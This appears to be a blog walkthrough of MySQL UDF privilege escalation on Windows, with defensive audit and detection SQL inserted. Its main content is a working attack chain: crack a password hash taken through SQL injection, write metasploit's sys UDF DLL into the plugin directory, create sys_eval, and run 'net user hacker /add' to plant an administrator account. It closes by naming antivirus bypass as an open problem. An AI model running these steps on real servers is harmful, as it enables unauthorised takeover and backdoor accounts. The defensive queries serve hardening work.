MySQL UDF privilege escalation
2022-07-05 06:32:00 【Viva alive】
MySQL UDF privilege escalation
UDF
A UDF is a user-defined function in MySQL. It works like a DLL: you write your own functions as a shared library and then call them from inside MySQL.
Preconditions
- There is a SQL injection vulnerability
- MySQL allows file reads and writes: the value of secure_file_priv is empty
- The database user has file read and write privileges
- The database user is allowed to connect from other hosts
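The four preconditions above can be checked on a server you administer with the queries below. This is an added example, not part of the original post; it targets MySQL 5.7/8.0, and the account name 'appuser'@'%' in the remediation statements is a placeholder for whatever account the audit actually turns up.

```sql
-- Added audit example (not from the original post). Run as a DBA account.

-- 1. File read/write: should be NULL (disabled) or a dedicated directory, never ''.
SHOW VARIABLES LIKE 'secure_file_priv';

-- 2. Where a UDF library would have to be written before CREATE FUNCTION ... SONAME
--    could load it. The plugin directory must be owned by root and not writable
--    by the mysqld user.
SELECT @@plugin_dir AS plugin_dir, @@datadir AS datadir, @@basedir AS basedir;

-- 3. Accounts holding the global FILE privilege, which LOAD_FILE() and
--    SELECT ... INTO DUMPFILE require.
SELECT user, host, file_priv, super_priv
FROM mysql.user
WHERE file_priv = 'Y'
ORDER BY user, host;

-- 4. Accounts that may connect from somewhere other than the local machine.
SELECT user, host
FROM mysql.user
WHERE host NOT IN ('localhost', '127.0.0.1', '::1')
ORDER BY user, host;

-- Hardening. secure_file_priv and plugin_dir are read-only at runtime, so they
-- are set in my.cnf / my.ini followed by a restart:
--   [mysqld]
--   secure_file_priv = NULL          -- the literal string NULL disables import/export
--   plugin_dir       = /usr/lib/mysql/plugin
-- Then narrow the accounts the audit flagged ('appuser'@'%' is a placeholder):
REVOKE FILE ON *.* FROM 'appuser'@'%';
RENAME USER 'appuser'@'%' TO 'appuser'@'10.0.0.5';   -- placeholder source host
```

Any row returned by query 3 combined with an empty secure_file_priv is the exact combination the rest of this post relies on; either finding on its own is worth fixing.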
Steps
- Use the SQL injection to obtain the database user name and password hash, then crack the hash to recover the plaintext password

- Connect to the database as the osanda user

- Check the osanda user's privileges
select * from mysql.user where user = substring_index(user(), '@', 1) \G

The user turns out to have all privileges
Prepare the UDF DLL
Check the system architecture and build type so the right UDF file can be chosen later (there are four to choose from)
show variables like '%compile%';

**Starting with MySQL 5.0.67, the UDF library must be located in the plugin folder, which can be found through the '@@plugin_dir' global variable. The variable can be viewed and edited in the mysql.ini file.** By default, however, this plugin directory does not exist
select @@plugin_dir;

If the MySQL version is below 5.1.60, the following two statements can be used to create the folder
select 'xxx' into outfile 'F:/phpstudy_pro/Extensions/MySQL5.7.26/lib::$INDEX_ALLOCATION';
select 'xxx' into outfile 'F:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin::$INDEX_ALLOCATION';
But when I tested on version 5.7.26, these two SQL statements could no longer create the folder; MySQL has probably added a security policy.
Starting with MySQL 5.0.67, the file must be located in the plugin directory, which is given by the value of the plugin_dir system variable. If plugin_dir is empty, the pre-5.0.67 behavior applies: the file must be located in a directory searched by the system's dynamic linker.
In older versions, the DLL could be uploaded to any of the following locations and a new UDF function created from it.
- @@datadir
- @@basedir\bin
- C:\windows
- C:\windows\system
- C:\windows\system32
metasploit ships with ready-made UDF files that can be used
Location of udf.dll

They can also be fetched from GitHub
https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql
For a 32-bit target choose the 32-bit file and for a 64-bit target the 64-bit file; Windows uses the .dll and Linux the .so
Convert the udf.dll file to hexadecimal and save it on the local machine; here I save it under the F:/phpstudy_pro/WWW/ directory
select hex(load_file('F:/phpstudy_pro/WWW/lib_mysqludf_sys_64.dll')) into dumpfile 'F:/phpstudy_pro/WWW/udf.txt';
Then export the hexadecimal content of the newly generated udf.txt to the plugin directory on the target host
select 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000… into dumpfile "F:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/udf.dll";
This may fail, because the target host has no plugin directory

At this point, create the lib/plugin directory

Export again and it succeeds

Having udf.dll on the target host is not enough; the function we want to use still has to be created in MySQL
Although the author defined many functions in udf.dll, we only need one of them: sys_eval()

What sys_eval does
This function executes a system command and returns what the command wrote to standard output. (Roughly the same as sqlmap's --os-shell, but commands that sqlmap cannot execute, sys_eval can; see the effect below.)
Creating sys_eval
create function sys_eval returns string soname 'udf.dll';

Testing sys_eval
select * from mysql.func where name = 'sys_eval';

If a row is returned, the function was created successfully
Deleting sys_eval
drop function sys_eval;
If you no longer want the custom function, this command deletes it
Once created, it can be used
select sys_eval('dir');
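The create/test/drop sequence above is also the defender's detection and clean-up path, read in reverse: every CREATE FUNCTION ... SONAME leaves a row in mysql.func, and that row survives even if the library file is later deleted from plugin_dir. The queries below are an added example, not from the original post; the 'osanda'@'%' host part and the allow-list library name are assumptions.

```sql
-- Added detection/clean-up example (not from the original post).

-- Every loadable function registered on the server (MySQL 5.7 and 8.0).
-- 'dl' is the shared library name as given in the SONAME clause.
SELECT name, ret, dl, type
FROM mysql.func
ORDER BY dl, name;

-- MySQL 8.0.14 and later also expose the loaded library and usage count.
SELECT udf_name, udf_return_type, udf_library, udf_usage_count
FROM performance_schema.user_defined_functions;

-- Flag any library that is not on the site's allow-list of approved UDF
-- libraries. The single entry below is a placeholder; an empty allow-list
-- would be WHERE dl IS NOT NULL.
SELECT name, dl
FROM mysql.func
WHERE dl NOT IN ('approved_udf_library.so');

-- Response: drop the function (the shared library stays loaded until the last
-- function from it is dropped), remove the file from plugin_dir at the OS
-- level, and take back the privilege that allowed the file to be written.
-- CREATE FUNCTION also needs INSERT on the mysql schema, so review that grant too.
DROP FUNCTION IF EXISTS sys_eval;
REVOKE FILE ON *.* FROM 'osanda'@'%';   -- host part as found in mysql.user
```

Because mysql.func is an ordinary system table, a scheduled job that snapshots it and diffs against the previous snapshot gives a cheap, version-independent alert for exactly the step shown in this section.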

Next, run a command that sqlmap cannot. Never mind sqlmap: even executing such a command locally requires running as administrator. It adds a user and puts that user into the administrators group
First look at the current users from another cmd window

Then use the sys_eval function to create a user named hacker
select sys_eval('net user hacker /add');

At this point Huorong antivirus popped up; its keen nose had smelled something wrong, and I hurriedly clicked Allow to calm it down
The result shows a piece of garbled text, but that does not stop the user from being added

Continue to view the current users

There is an extra hacker user
Next, promote the hacker user to administrator

View the administrators group from another cmd window: hacker has become an administrator

This is what is commonly called UDF privilege escalation
Summary of difficulties
- How to create lib/plugin by some other means (manual creation is not possible in a real scenario)
- How to bypass antivirus software such as Huorong